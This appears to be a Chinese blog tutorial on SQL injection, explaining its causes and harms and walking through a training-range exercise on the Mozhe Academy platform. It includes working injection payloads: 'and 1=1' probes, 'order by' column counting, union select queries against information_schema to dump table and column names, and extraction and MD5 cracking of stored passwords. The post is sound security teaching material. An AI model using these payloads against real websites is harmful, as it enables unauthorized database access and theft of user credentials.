SQL注入
SQL注入存在的原因:用户输入的信息中含有sql语句的关键字,并且这些关键字参与了sql语句的编译过程,从而导致了sql语句的原意被曲解,进而达到了SQL注入。
SQL注入存在的危害:
- 攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
- 通过操作数据库对某些网页进行篡改
- 修改数据库一些字段的值,嵌入网马链接,进行挂马攻击等
- 可以对数据库中的数据进行增加或者删除操作。
- 破坏硬盘数据,导致全系统瘫痪。
首先测试一个网站是否存在SQL注入,我们可以通过传统方法:
http://www.xxxcer.com/new_list.php?id=1 and 1=1 //正常回显
http://www.xxxcer.com/new_list.php?id=1 and 1=2 //不正常回显这里存在一个问题,如果参数id有注入,以下哪个注入测试正确?
http://www.xxxcer.com/new_list.php?id=1&page=2 and 1=1
http://www.xxxcer.com/new_list.php?id=1 and 1=1&page=2
http://www.xxxcer.com/new_list.php?id=1 and 1=1&page=2 and 1=1
http://www.xxxcer.com/new_list.php?idd=1 and 1=1&page=2 答案是2.3是正确的,因为参数id是存在注入的,而我们在其他的参数后面进行测试,是不起任何作用的。
通过墨者学院的一个靶场进行SQL注入的入门练习:
拿到网站的地址,通过and 1=1(正常回显)以及and 1=2(回显不正常),因此我们判断存在注入,接下来,我们通过order by来测试字段的数量;
通过order by语句测试出存在四个字段,接下来通过报错显示,id=-1 union select 1,2,3,4;来查找回显点。
故我们可以得到2,3位置是回显点,接下来猜测数据库名,用户名,操作系统以及数据库的版本。
因此得到了用户的表名为root@localhost;操作系统为Linux;数据库的版本为5.7.22-0ubuntu0.16.04.1;数据库名为:mozhe_Discuz_StormGroup;在MySql5.0以上的版本中,存在一个自带数据库名为information_schema,他是一个有存储记录所有数据库名、表名、列名的数据库,也相当于可以通过查询他获取指定数据库下面的表名或者列名信息;接下来我们开始查询数据库mozhe_Discuz_StormGroup中的表名;
union select 1,table_name,3,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'得到表名为StormGroup_member;接下来查询列名:
union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name = 'StormGroup_member'从而得到了所有的列名:id,name,password,status;然后我们通过查询name,以及password中的值进行登录。这里的password还涉及到md5加密,我们将得到的md5值进行解密得到最终的密码。
解密之后,进行登录,我们便可以得到最终的答案。
7712
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
